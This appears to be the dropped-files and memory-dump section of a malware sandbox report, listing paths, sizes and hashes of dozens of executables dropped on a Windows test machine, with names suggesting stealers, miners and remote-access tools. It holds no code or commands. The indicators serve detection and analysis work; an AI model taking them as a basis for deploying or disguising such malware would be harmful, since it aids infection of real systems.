947cc709af9b0497dd80ea1c777c7c113f6c0e958aa34847b4b64edbdbe49af11c17e3cc68cbc3e1b86dd0f961f35b0cda12ee95c3e29866fbf5a57aa2f62a03

Download Submit
C:\Users\Admin\AppData\Local\Temp\nautr.exe

Filesize
2.5MB

MD5
e0df3f75617bc94f9094d476a2a55ff0

SHA1
6b66cdb4dbe1f05e53d0e0e34b3e2d71b0098e00

SHA256
dd483c5a9e8d886f4189b170cca29d0074352c2d1ee45525d6574e35677a4548

SHA512
099d539cf6548c3421ec1eda1124e5b97dbdaa465d48d1945ddb87bd899d74aaa2e2a1ec9f0743088b05ad48583480c73f368624c9d27e85a4a533eb928f2729

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsu7274.tmp\INetC.dll

Filesize
25KB

MD5
40d7eca32b2f4d29db98715dd45bfac5

SHA1
124df3f617f562e46095776454e1c0c7bb791cc7

SHA256
85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9

SHA512
5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

Download Submit
C:\Users\Admin\AppData\Local\Temp\supportoxmr.exe

Filesize
2.5MB

MD5
83cd8afeb02a8bea8037c930655a908a

SHA1
9c867fca7c9e3354095c598c573bff74104a35fd

SHA256
969d2aeb94625e483c97d870d9da34f49cb73ad7c460bd3525ee9c28460bff3c

SHA512
e4b83f1bd0dbccb883d43793da4063d9352340d70717750ac4616879b44eeafc93a5a6efe7acb1768ca6e0a9a9970303f51f3f89af5f568afa0bce5d694ada64

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
3.9MB

MD5
02569a7a91a71133d4a1023bf32aa6f4

SHA1
0f16bcb3f3f085d3d3be912195558e9f9680d574

SHA256
8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

SHA512
534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

Download Submit
C:\Users\Admin\AppData\Roaming\XClient.exe

Filesize
30KB

MD5
904ba69c5ea03f127ee9b75ac8583e96

SHA1
9778c83bfbfc5c60cf65605a936a4fab028f18b3

SHA256
fae08c48077eebb300d63bf593e3c3087b5107c72caf5f1517d3560d44ebd5cb

SHA512
2391ebcc626b68432b0b7d6d185db523a9e0cb6ce415b4aa6601324ce2fc87da161ae835d410b935e2e775f95a50e1206fe4be607526e03f5992ca162bd6fcf1

Download Submit
C:\Users\Admin\AppData\Roaming\ccleanerfile.exe

Filesize
297KB

MD5
6b7ff49ed54117a9965d9b54be1f6f99

SHA1
7100f12c6ae89024495287264a86cd607446da49

SHA256
8413eeaabd7b34112484fcb51df8be7e3259cdbc5f02d8c8aff61e3d1f7c58ae

SHA512
ce2593b849fab8bbe511c16832a5a927631c6d8fd50c4e1fe948cf3218ddb3658bc108ecaa60085b2e40a9e858e57e5ee87a2fe789ce9c37e9110e37b93eb55a

Download Submit
C:\Users\Admin\Desktop\4363463463464363463463463.exe

Filesize
10KB

MD5
2a94f3960c58c6e70826495f76d00b85

SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a

SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f

Download Submit
C:\Users\Admin\Desktop\4363463463464363463463463.zip

Filesize
4KB

MD5
202786d1d9b71c375e6f940e6dd4828a

SHA1
7cad95faa33e92aceee3bcc809cd687bda650d74

SHA256
45930e1ff487557dd242214c1e7d07294dbedfa7bc2cf712fae46d8d6b61de76

SHA512
de81012a38c1933a82cb39f1ac5261e7af8df80c8478ed540111fe84a6f150f0595889b0e087889894187559f61e1142d7e4971d05bceb737ed06f13726e7eae

Download Submit
C:\Users\Admin\Desktop\Files\%E7%9B%AE%E5%BD%95%E8%A1%A8%E6%A0%BC%E5%90%8D%E5%8D%956001.exe

Filesize
167KB

MD5
e34e2a710f0a16b80e71a62177960ac7

SHA1
0401662b46ca67211a098895202e10e579b2f1dd

SHA256
5c7732875644cd8e7f9dd11101ba19b5732ae2da57e72a88f79d07f8814a457b

SHA512
eb639e330404e28ce16fa3f1d9c52a4107a8fdf8744b595c87af2637e740c50fe88d7c2a2d17fc17fe7d17732be7c22c250298d40ebbc0669fe4aa3f81b19a34

Download Submit
C:\Users\Admin\Desktop\Files\AAQ.exe

Filesize
806KB

MD5
6c495bef7c3b6622ff56e49822dc6796

SHA1
baa7611e5945ac6eff3038b1b2b0411a4aeb9c2d

SHA256
f4085b40140a0500b17b6b1b20698af8c68a096ed072252d1e65d05286724972

SHA512
90fc07fb95a3eea35d64a280d29607c844280cf6af1a575fdf506b04b10b4cd1428a5975e8c193c308f90a29f7b6f3be99c7c4d7195ec18a0717f779a8d67bd4

Download Submit
C:\Users\Admin\Desktop\Files\DRIVEapplet.exe

Filesize
1.5MB

MD5
c4e001619235115554ea402f7a5d59a2

SHA1
a25dc2a54cbce507ef5772aa1a1f672ecadb852c

SHA256
b16f2105a4d119404ff79632a2de12c2282834382a2c131426208e9d4819b7a2

SHA512
e4febc0618ebd9575c427ffbc57d1c6186eadd604bacca348d35ddad7cbd47ac64166569873c6df0c13dc1b007751fa0d4f943c49859d941135f2c3b118f6346

Download Submit
C:\Users\Admin\Desktop\Files\DRIVEapplet.exe

Filesize
4.6MB

MD5
915e73432043f7666919cda54815bf6f

SHA1
8c4f0faf612938ef9a3513aa48a5f8cec8ce1289

SHA256
2275d323b2591aba2d76160cf4f6b12f5f3018da7fa64978ada989dfb127a2b8

SHA512
67d9fcddfed41cd1f547d0e9a8a6a5cd46d37c370ae22a3a9d501623c6398b9352fa0493af9d29358a74049f7f2c28501231719b4025624abe8d003a85a402a5

Download Submit
C:\Users\Admin\Desktop\Files\Unusoke_LetThereBeNightingale.exe

Filesize
144KB

MD5
a9f33c6ea314443e52c1f1d37acd0f6d

SHA1
9a4b13363f1051219134925eeafa9d2adeaa59c5

SHA256
3fdc03614a8b2caa08574a25a97f7e08b1d6297850cc5ebe716a877c99b86e6d

SHA512
f4b4dc6b8e9ded9eb9850dcdc3f066d74752786a01715b27313abbe16f0a2ec014d03a36b71c9acba9581a84daed26da016f5db4ce171d1e4723867cc7316b7f

Download Submit
C:\Users\Admin\Desktop\Files\Zinker.exe

Filesize
2.4MB

MD5
b11913361b2d4c43c00c1969184050a8

SHA1
8358fa3426e4136e0873a32f49f5f367770bad0a

SHA256
de39bc2c5f18ae468501a573ee5cb9b22f2f608ec2fc51954b44d4549fac2a57

SHA512
2d25c021ddf59a10b63c56d85a550e7454767444472f3e40662dda1e1dddeef551202253cf9137bf4054ed832cd59c53b66aba6d42361f044fe4e7b06bef2026

Download Submit
C:\Users\Admin\Desktop\Files\cctv2xiaobao.exe

Filesize
280KB

MD5
476c77350e546ca7808b9e2d5c7a8781

SHA1
5f2268041ab9de4c07c211c15c4f25fa74281d35

SHA256
c87c4c24db00f5d3c9c454d5dcb0918491a0f98e2fa64be5cdd3c474149e97b3

SHA512
7b0f32eedba5b9c8d790766ed582964cb486e74ad31bed001608a08bfd146a4a4fd5851a2170a5bf811bd1cb54cecf43182ab1e71f870d851adf093c85a54b6e

Download Submit
C:\Users\Admin\Desktop\Files\cleaner.exe

Filesize
438KB

MD5
cf613db0a4c345455a59fa2f70e084ee

SHA1
2d1b8beaa44d2716d2b283a7cc486d744ecc4d8e

SHA256
83037ad76ddddabca05efe07e731d65c5d9069ad889e46306b753cbc7561fa59

SHA512
9def72afaaa214d8f2fad905d6eee731b269826b59e6471700f342f9fa040f8f9007e94ef073027f3d5a5060fe4dd35c63a276e301ea5cd9a3d793c73ab28759

Download Submit
C:\Users\Admin\Desktop\Files\cluton.exe

Filesize
282KB

MD5
173cc49904c607c514e2f4a2054aaca0

SHA1
0b185b7649c50d06a5d115a210aa3496abf445c2

SHA256
985d2a5f97ed03ae735c7f30f950846339d5fce5c18491326edec9a8be5cc509

SHA512
f2a83903311969c96aa44df504e9c8118fb2be0a46058502da744ab4790c476e36474ec856afc8a70d599e11df319597d0998f7f9d9e0751899eac92fe567624

Download Submit
C:\Users\Admin\Desktop\Files\cp.exe

Filesize
1.8MB

MD5
97256cf11c9109c24fde65395fef1306

SHA1
e60278d8383912f03f25e3f92bf558e2a33f229d

SHA256
21c23083404349dbc8e7094338acaa07ea5a7e3a442bb81a528e06c175b8d934

SHA512
41e9c7911c1f461ec389ac9d430898bd9e21accf6b4291d30c4e743084bb19c2ae9279597f4a43cfaec621263cb135c3ada21e23e27cc7961c794fa499910c6e

Download Submit
C:\Users\Admin\Desktop\Files\drivermanager.exe

Filesize
3.6MB

MD5
c28a2d0a008788b49690b333d501e3f3

SHA1
6a25fdb8613db00b09d4d6e1ad302c20c7f7e2c4

SHA256
f61712dccccf8f19c6dbf0dfb7c7c0be9eb2f13d3381ee94e4cb6cb70ffb5f5a

SHA512
455923a63e60b6079d7e0af2bfae5f922b205d024def456ae95158ef1bfcdbc4f56e24b4421a2203f4618d0ea29e229e331c7ee0d7881ee8ebac83fa72f5d788

Download Submit
C:\Users\Admin\Desktop\Files\ghjk.exe

Filesize
5.4MB

MD5
a2a9c309c5300a53d2c2fc41b71b174b

SHA1
f6c26eae1925425fa8966266e87a57b688fad218

SHA256
7ccfae8644c3bc7439b88f2dc0de06bb5082de09b0bf5e143de17487ff252224

SHA512
a29eec8fa98174a74e9bd93c5902cdd95ce329ff8b7a1469901a95705dc1d7fffde58afa296399febb8559d8cd73c932945e85cce8af54e7a672d8f1618e3f7c

Download Submit
C:\Users\Admin\Desktop\Files\gold.exe

Filesize
522KB

MD5
70a578f7f58456e475facd69469cf20a

SHA1
83e147e7ba01fa074b2f046b65978f838f7b1e8e

SHA256
5c8d556e39269b22e63ba9c941ff306bb043bc35125ba08787617577231b381a

SHA512
707ed48b45978d26faaf3544bf22912461503d6e4b1a077cbb7c3a8abd2f1eb3fec16b2786a79ae4db2dfec92f662ece1998bc142706d2b482599fb6191563c0

Download Submit
C:\Users\Admin\Desktop\Files\hellminer.exe

Filesize
18.9MB

MD5
b7918613de76fc795f1410f2e1073f6e

SHA1
cb4357229f6506557db0a10a15cc7b3bfda9987e

SHA256
de1e4b30fc56292af56c3efb280e3789545fde702f0d2d51501d96f855ab90e4

SHA512
37f41196e57624b3e3745349b6ba381f6ef876946cb8b58d0c287244a88d97b73b5ae417bedfde2eb9d42fd9209aa40182acbd4b082d3ea9b70fd8b24135a702

Download Submit
C:\Users\Admin\Desktop\Files\look.exe

Filesize
668KB

MD5
14ab397c433b92d64015617db5065e44

SHA1
8bf6233d6689ef9bce781b7999e482906a288143

SHA256
a8602f61da135d8dd308b6acb0338f9b9da4024f9ff302490800af85b242eeed

SHA512
d9f36d85907e77316298a0b5db54c09285fba4de780b130c1a7a9d36f309c428a99ec294e6df2a71402ba2e1dc4b424c1810d1f403a45b8bd2b8799aa9cd121c

Download Submit
C:\Users\Admin\Desktop\Files\luma22222.exe

Filesize
310KB

MD5
f4d57589a7db46677d1ced8f8123feda

SHA1
2f08e4304eb3918b136ed53700cf7b8cce5e58e8

SHA256
06b033d1499fef5a177b5e76bda5eb533a6788b2995b7cdc0765b98cea4a37b6

SHA512
c81c7c56cc09ddf492330edf904719d89fe9b65ec7b9e041831143506559ce3dd9d3f9f98230e3ba80af4b0dd36ec4c6caf6c839d3e94d097fa6fcd005369d87

Download Submit
C:\Users\Admin\Desktop\Files\nine.exe

Filesize
366KB

MD5
adfe559d2d129240fb8cfa555e236012

SHA1
c35a22ac7033a78749a90611d9346a591c9e79f6

SHA256
ace210987cdbcaec97c6aaa0d130b5ee62ec85a321636a488b116c0a0b6a5a2d

SHA512
9f1cb0bed19417c08ddf38a97be672253759f515e5bbd68bb26e15f0c00c8b3516572583217da2375fea1d6c310ef8f70fc083f5018b725ce548bfc6f9f9ce6e

Download Submit
C:\Users\Admin\Desktop\Files\npp.exe

Filesize
9KB

MD5
8d8e6c7952a9dc7c0c73911c4dbc5518

SHA1
9098da03b33b2c822065b49d5220359c275d5e94

SHA256
feb4c3ae4566f0acbb9e0f55417b61fefd89dc50a4e684df780813fb01d61278

SHA512
91a573843c28dd32a9f31a60ba977f9a3d4bb19ffd1b7254333e09bcecef348c1b3220a348ebb2cb08edb57d56cb7737f026519da52199c9dc62c10aea236645

Download Submit
C:\Users\Admin\Desktop\Files\output.exe

Filesize
5.5MB

MD5
461e951ba79964b681e9a8bc9d61a92c

SHA1
c860285cc237d35022fea21eba03c82e86ea3d1e

SHA256
de36e0af9cd7e32d781be2ab937a7dca33a9f93dcbecd06ff944641e5196c51f

SHA512
b85af74593267854a24d9a03a046c3d00cfd25401a9b304061f508d46c559e4773801dda28c0a54c15b2c9334fbfa2f391be9194828334cbe4be50811ed0c19f

Download Submit
C:\Users\Admin\Desktop\Files\pt.exe

Filesize
4.6MB

MD5
28b734a208be706ba26a552f1b0adafe

SHA1
ed48a80461aa0a8105075bb219ec154b6112d759

SHA256
a7f44db1d0eff2bff49da2a4c059c2104b900e173da5fad6cec88fbf46a7dd9c

SHA512
febf36e69cfa428cf1fd887ffc5d12c8f4ba4f4a9e65c4ff6cc415f977984eb4e3496758289bc9fe94a308515764a0be3a949789ab89a7690e3f89ccb1085828

Download Submit
C:\Users\Admin\Desktop\Files\redline123123.exe

Filesize
297KB

MD5
0efd5136528869a8ea1a37c5059d706e

SHA1
3593bec29dbfd333a5a3a4ad2485a94982bbf713

SHA256
7c21c1f3063ba963818542036a50f62ac7494ad422e7088897b55c61306ec74e

SHA512
4ac391812634107e4a4318c454a19e7c34abfc1f97acc9bcd0fac9a92c372e5ebfe809e5c433479142537762ed633564bc690b38fc268b169498d6a54249e3fe

Download Submit
C:\Users\Admin\Desktop\Files\services64.exe

Filesize
16.9MB

MD5
c8a50a6f1f73df72de866f6131346e69

SHA1
37d99d5a8254cead586931f8b0c9b4cf031e0b4d

SHA256
59e6a5009ce5e9547078db7f964bb8fc10ee999dd35b7e9243f119db8337aa8d

SHA512
9f9230c58ddb8f029421a494220023253d725105ac2575d4ecd818c139dfaf77c7d559c58b66d764d78f3ffa19296f05af6a5d02f795b22512e6979671f2d745

Download Submit
C:\Users\Admin\Desktop\Files\time2time.exe

Filesize
380KB

MD5
fe665d942986f9e9de5d8cae9ec3dae0

SHA1
192b38312c2e28604abc343d5406e13e1ba4cff0

SHA256
cba2a72c3537cca446bf22df0b670fe6cefd0126547bedee450e3f4c31e52ab0

SHA512
1dfe804be315985eb2f5943cff89382f05bb61cc5dfa4802fde81f8a366b2f1784fa838ff6f38ef7e35f8511e946902e893a29b7bd6138b9c34018d48febf531

Download Submit
C:\Users\Admin\Desktop\Files\vpn-1002.exe

Filesize
49KB

MD5
ccb630a81a660920182d1c74b8db7519

SHA1
7bd1f7855722a82621b30dd96a651f22f7b0bf8a

SHA256
a73dc535324b73ab10c09ed2b965fc1b504a828f6059ddf99e26b9c03642a346

SHA512
8fd536da55b8e2a514bcea9cbe62492af1168b7713ea5955f3af8fcfa8060eac4ee079022380ab5ba5f9f7610a595981ed2f472fb14d569ac82057c50a785811

Download Submit
C:\Users\Admin\Desktop\New Text Document mod.exse

Filesize
8KB

MD5
69994ff2f00eeca9335ccd502198e05b

SHA1
b13a15a5bea65b711b835ce8eccd2a699a99cead

SHA256
2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2

SHA512
ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3

Download Submit
C:\Users\Admin\Desktop\New Text Document mod.exse.zip

Filesize
7KB

MD5
a7b1b22096cf2b8b9a0156216871768a

SHA1
48acafe87df586a0434459b068d9323d20f904cb

SHA256
82fbb67bf03714661b75a49245c8fe42141e7b68dda3f97f765eb1f2e00a89a9

SHA512
35b3c89b18135e3aca482b376f5013557db636a332a18c4b43d34d3983e5d070a926c95e40966fafea1d54569b9e3c4ab483eaca81b015724d42db24b5f3805f

Download Submit
C:\Users\Admin\Desktop\a\0x3fg.exe

Filesize
415KB

MD5
c4aeaafc0507785736e000ff7e823f5e

SHA1
b1acdee835f02856985a822fe99921b097ed1519

SHA256
b1d5b1e480a5731caacc65609eaf069622f1129965819079aa09bc9d96dadde5

SHA512
fbaefbce3232481490bce7b859c6c1bafd87ee6d952a2be9bf7c4ed25fe8fc9aff46c2246e247aa05ce8e405831a5905ca366c5333ede0af48f9a6287479a12d

Download Submit
C:\Users\Admin\Desktop\a\1.exe

Filesize
224KB

MD5
b96f0135250aab5a530906d079b178e1

SHA1
0247f3518116f23386796fc14991825dddfe1db8

SHA256
004eeca29e9a5bf7e40352873677e4a816e4efea504d96a3c308711fc5ada749

SHA512
244f56d2afd174f7f4e6430fcaa72d973b849a966d5df398d9a4120179dea9710689ed6d62a67e6adf4649a62cdec74ccd42de7e2f67e697ee3d1b50519fc4bd

Download Submit
C:\Users\Admin\Desktop\a\BuildTotale.exe

Filesize
12.1MB

MD5
1e22ab0b7a7c4f661c41c49229db2686

SHA1
75355672da0badf66d6f8603e9f4fe35f64044d6

SHA256
69e09996eb1ae773ddb1f83f6142d2e6cad83070567a330275cfc66769256b4a

SHA512
8ae9aafc97f1b86b6eb9ad1b7816dfaf98fbed98b704053497bf9b82f0e583c401c29f1eca101639f192e4c75e59b8308ac3a440f1e1c35c4004860e117ebb8e

Download Submit
C:\Users\Admin\Desktop\a\ChatLife.exe

Filesize
2.4MB

MD5
033e16b6c1080d304d9abcc618db3bdb

SHA1
eda03c02fb2b8b58001af72390e9591b8a71ec64

SHA256
19fcb719130f0edd27552e014d5b446e85faabe82611311be6dbe28d33463327

SHA512
dbed8360dadb8d1733e2cf8c4412c4a468ade074000906d4ea98680f574ed1027fc326ccb50370166d901b011a140e5ee70fb9901ff53bf1205d85db097f1b79

Download Submit
C:\Users\Admin\Desktop\a\FirstZ.exe

Filesize
2.5MB

MD5
ffada57f998ed6a72b6ba2f072d2690a

SHA1
6857b5f0c40a1cdb0411eb34aa9fe5029bcdb84f

SHA256
677f393462e24fb6dba1a47b39e674f485450f91deee6076ccbad9fd5e05bd12

SHA512
1de77f83a89935bb3fc3772d5190c3827d76a998785d451e2c0d11a0061cfd28f1b96eccb41b012c76ddda2021e3333a0a647489ae3c6dac10cfb8302abdf33f

Download Submit
C:\Users\Admin\Desktop\a\SetupWizard.exe

Filesize
35.6MB

MD5
2396be52963d4de299555880b2723f04

SHA1
c7e3071e225f4ce93b390b11433d9cae8f07c726

SHA256
3e788961bac4517e3ecbf9a86fa233bf91231aba503aea8843867e8f3453458a

SHA512
6e94d73b7b4a6058056f55b6e3bf979abcd2602da65f3b8d664503f8d703e0ee88b1fa5042be875e1a6d302612364455d36d790e7c697f4fe1cae007a2f403ff

Download Submit
C:\Users\Admin\Desktop\a\ama.exe

Filesize
297KB

MD5
5d860e52bfa60fec84b6a46661b45246

SHA1
1259e9f868d0d80ac09aadb9387662347cd4bd68

SHA256
b4a1e470f814bbcf1bc26c087eb513f4bab6165c90ecf43ac71dd87702561c30

SHA512
04ea5757d01508a44e0152b3aa78f530908da649d59b8ce7ee3e15c2d4d0314c97f346c1e79b1810edb27165d04781c022937d02536dc9b1dd4c55f023a47701

Download Submit
C:\Users\Admin\Desktop\a\epitheliogeneticTFr.exe

Filesize
181KB

MD5
7ca21eefff568606fed91321aaa31ba2

SHA1
faa744b10ef6799cce234dcc79474588f9f44bc9

SHA256
950eee474cf4cb3b59178b348cfd618460dc7a895b6a024aa7b3c07845b5c6ab

SHA512
24533c0e1cbc9459b269281b074bd26a35edc07662bd6c9dba9606109e39f91c23808eafd5ca2f7c7adf23983e453d3049eba7b669d3ad16106d9fa73c26d538

Download Submit
C:\Users\Admin\Desktop\a\gui.exe

Filesize
527KB

MD5
8af55ab72dc0c45e52c7af0752cbbc4a

SHA1
227539093c2ca889a1f45e31fb124911d2de6519

SHA256
243e063270a045632b688cf570c2e9a8b4c3d2705726ad6b2ebf312e9f278e0e

SHA512
05ed4192b47c7c007712b2266d739a684b33f4d10ee77a10fdd15d9952ac23309d8ea2045efe80e59a14adddd196ca596a4f39d5963ebc8ad95969a2c4b7cbcd

Download Submit
C:\Users\Admin\Desktop\a\limba.exe

Filesize
3.2MB

MD5
85ced2db3844ef1f2845ecdcc5d7abd7

SHA1
e8d6caa8dea7ea66461be21d57216e623fe1ab88

SHA256
4aca1be03112e87584d9ac9ae0f8279ba272ff5c0daa12f409b2dc00b3c521ad

SHA512
f3ab409e3cd62fe00a5252c6feaad504fcd2a4f1bbbb57946bf811e0c5a66442942302ee69f58f5ae2170aed7d0c26eff553fa0f342ea76783edb3df7a720662

Download Submit
C:\Users\Admin\Desktop\a\pic1.exe

Filesize
4.8MB

MD5
1fecbc51b5620e578c48a12ebeb19bc2

SHA1
94fe551f4fb3ff76a0be99a962dc20fc2656453e

SHA256
9a4c96b227213b7049f851572487d42c994220bbf584f631bf347a507b684c1a

SHA512
ede6f39946562e253fcafe225292db32ba30f9476557304ae1769830e3a46c660920c304ca42d52544411e41acfc1bf206c829c98d61948cb595b1fa0105e2d7

Download Submit
C:\Users\Admin\Desktop\a\serieta.exe

Filesize
12.1MB

MD5
448effb3d85fb89c7f190cb99ffa73fc

SHA1
cbbb99017a213a46791ce3712f1297ba4a1ae72a

SHA256
f8c91e7edae8c63c29dd51becb5c806305c83cf19bc576401a6802f3cd4aed66

SHA512
026d5af0234d577dbc505a90fbedd6ce90a216ca557e527e0b3f66c00474ec8dac6bffd3a3ad6211ecee02ff557e99aa01d97b9626b73f4ced5ee78241461c9c

Download Submit
C:\Users\Admin\Desktop\a\setup.exe

Filesize
36.5MB

MD5
0e12bdd2a8200d4c1f368750e2c87bfe

SHA1
6c8b533e2c7f6ebef027971c3a06f4c55ed64cfe

SHA256
af77c0b6a10ac159b0e3c87c02e16a2b44daab8e67fe097327e90ae48f814403

SHA512
909f15876f3a6cbe608eb53df4286927b013c45ff6acbc496a1590b9cc3fe47b1bb449ed45c3302f6d03cccb876cd2cc26f2b5e7c1ca4ff2d17dd4dee77bf75b

Download Submit
C:\Users\Admin\Desktop\a\setup222.exe

Filesize
96KB

MD5
8677376c509f0c66d1f02c6b66d7ef90

SHA1
e057eddf9d2e319967e200a5801e4bbe6e45862a

SHA256
f7afac39d2754ac953bf129ee094c8b092e349cdf35f1ba23c2c76a0229f9e96

SHA512
e0c685e289c10a48b5fa251aa4414653c103dac69faf536b9ae9598e066aab5a03b03c09096c42a0f244aeaf80f2b9e4aa28d6b28da436587a3f52a9155473d0

Download Submit
C:\Users\Admin\Desktop\a\svchost.exe

Filesize
444KB

MD5
39d865aa4171442b417c40479e63a03f

SHA1
0da788f33274472b1b2217a31301eddd95c7e77c

SHA256
0e4db144b872080e865f2ce5d7dc2edeb47eb304d109c3f16c82c04ce626644f

SHA512
619e5585a51dd03bddef2a67e7bbce0742266750548004a4c664715d5a217fd9477de22c91218b39a6c5d957ec1f4fb3a6743ebf9ad86814632e55750cd4ca82

Download Submit
C:\Users\Admin\Desktop\a\taskweaker.exe

Filesize
5.8MB

MD5
6c149b39619395a8ba117a4cae95ba6f

SHA1
3ef8be98589745ecce5522dd871e813f69a7b71b

SHA256
c43b64c78f6ccba5cfb7de13fc39d5cc43fad9a9f5e78799b34100ab69e5e4e8

SHA512
866edae7858e7bfb82486e99b31550307de81fa732a3075b6e2ff0abcade5331be28bb14d894cdf5176dc907a45aaa1407b6d8c4295cc69b6d45516f319560a4

Download Submit
C:\Users\Admin\Desktop\a\uYtF.exe

Filesize
2.5MB

MD5
4691a9fe21f8589b793ea16f0d1749f1

SHA1
5c297f97142b7dad1c2d0c6223346bf7bcf2ea82

SHA256
63733ff3b794ebd7566103c8a37f7de862348ffacf130661f2c544dea8cde904

SHA512
ee27d5912e2fb4b045ffd39689162ab2668a79615b2b641a17b6b03c4273070a711f9f29dd847ffff5ae437d9df6102df6e10e898c36d44ec25e64ba1dd83386

Download Submit
C:\Users\Admin\Desktop\a\version.txt

Filesize
1B

MD5
c81e728d9d4c2f636f067f89cc14862c

SHA1
da4b9237bacccdf19c0760cab7aec4a8359010b0

SHA256
d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35

SHA512
40b244112641dd78dd4f93b6c9190dd46e0099194d5a44257b7efad6ef9ff4683da1eda0244448cb343aa688f5d3efd7314dafe580ac0bcbf115aeca9e8dc114

Download Submit
C:\Users\Admin\Pictures\9wQ2CPcMD8zxNZMpSACHA1mE.exe

Filesize
7KB

MD5
77f762f953163d7639dff697104e1470

SHA1
ade9fff9ffc2d587d50c636c28e4cd8dd99548d3

SHA256
d9e15bb8027ff52d6d8d4e294c0d690f4bbf9ef3abc6001f69dcf08896fbd4ea

SHA512
d9041d02aaca5f06a0f82111486df1d58df3be7f42778c127ccc53b2e1804c57b42b263cc607d70e5240518280c7078e066c07dec2ea32ec13fb86aa0d4cb499

Download Submit
C:\Users\Admin\activate.bat

Filesize
89B

MD5
d58c7fcb7af4dba94dd8918ef29d5ec3

SHA1
9671c90d94b89d1845c3710d2d5435cdf08ba249

SHA256
44d51facca088638f287e709658abaf3f96e0ae25c0c61c47a9af85e764a29b1

SHA512
3294add7249a6c12ab192d5236060364f1e57c1d093b469530fe793403646e6dc2d5b9afe4032745019ba62902803cf91c8ce894b6795e4f7e5fe9d654790edb

Download Submit
C:\Windows\System32\winsvc.exe

Filesize
41.6MB

MD5
312c3e03890f7d5242fe2158acabd4e8

SHA1
d148cf18f876b55c03f2718bfff321b7d6287f87

SHA256
6ac290f077cd4228dff7dc37a4c37e0a675207ad345543e8cd01008ce67ea751

SHA512
da0e5c199a7ab586a17dd7b74cc4b6727ac5c9efcb3397b45f8806a6418c20bfc7515804ca10e2a9c52b207b56f3a56c86e3c3be646ffe27f988c59b0bc66971

Download Submit
C:\Windows\Temp\ljeycaejejzp.sys

Filesize
14KB

MD5
0c0195c48b6b8582fa6f6373032118da

SHA1
d25340ae8e92a6d29f599fef426a2bc1b5217299

SHA256
11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

SHA512
ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

Download Submit
C:\Windows\sysmablsvr.exe

Filesize
88KB

MD5
4505daf4c08fc8e8e1380911e98588aa

SHA1
d990eb1b2ccbb71c878944be37923b1ebd17bc72

SHA256
a2139600c569365149894405d411ea1401bafc8c7e8af1983d046cf087269c40

SHA512
bb57d11150086c3c61f9a8fdd2511e3e780a24362183a6b833f44484238451f23b74b244262009f38a8baa7254d07dfdd9d4209efcf426dfd4e651c47f2f8cec

Download Submit
\??\pipe\crashpad_8_ABFYEEBKTOXIBFDU

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/764-17681-0x0000000004B30000-0x0000000004C18000-memory.dmp

Filesize
928KB

Download
memory/764-19884-0x0000000004D60000-0x0000000004D68000-memory.dmp

Filesize
32KB

Download
memory/764-19885-0x0000000004F10000-0x0000000004F66000-memory.dmp

Filesize
344KB

Download
memory/764-17680-0x0000000000740000-0x00000000007EC000-memory.dmp

Filesize
688KB

Download
memory/936-1072-0x00000000007F0000-0x00000000007F8000-memory.dmp

Filesize
32KB

Download
memory/1444-295-0x000001CFC4170000-0x000001CFC4178000-memory.dmp

Filesize
32KB

Download
memory/1444-299-0x000001CFC5CF0000-0x000001CFC5CF8000-memory.dmp

Filesize
32KB

Download
memory/1444-263-0x000001CFBFB90000-0x000001CFBFBA0000-memory.dmp

Filesize
64KB

Download
memory/1444-279-0x000001CFBFDB0000-0x000001CFBFDC0000-memory.dmp

Filesize
64KB

Download
memory/1824-1578-0x000000006B580000-0x000000006B5B9000-memory.dmp

Filesize
228KB

Download
memory/1996-20938-0x0000000000970000-0x0000000000D0C000-memory.dmp

Filesize
3.6MB

Download
memory/2052-1705-0x0000000000460000-0x00000000004B0000-memory.dmp

Filesize
320KB

Download
memory/2208-1682-0x0000000000630000-0x00000000006A4000-memory.dmp

Filesize
464KB

Download
memory/2616-12785-0x0000000000F00000-0x00000000011BC000-memory.dmp

Filesize
2.7MB

Download
memory/2616-12787-0x0000000005A20000-0x0000000005CD8000-memory.dmp

Filesize
2.7MB

Download
memory/2616-17678-0x0000000005F70000-0x0000000006064000-memory.dmp

Filesize
976KB

Download
memory/2680-1035-0x0000025E0DDD0000-0x0000025E0DDE0000-memory.dmp

Filesize
64KB

Download
memory/2680-1019-0x0000025E0DDD0000-0x0000025E0DDE0000-memory.dmp

Filesize
64KB

Download
memory/2680-1007-0x0000025E0DDD0000-0x0000025E0DDE0000-memory.dmp

Filesize
64KB

Download
memory/2680-1008-0x0000025E0DDD0000-0x0000025E0DDE0000-memory.dmp

Filesize
64KB

Download
memory/2680-1009-0x0000025E0DDD0000-0x0000025E0DDE0000-memory.dmp

Filesize
64KB

Download
memory/2680-1012-0x0000025E0DDD0000-0x0000025E0DDE0000-memory.dmp

Filesize
64KB

Download
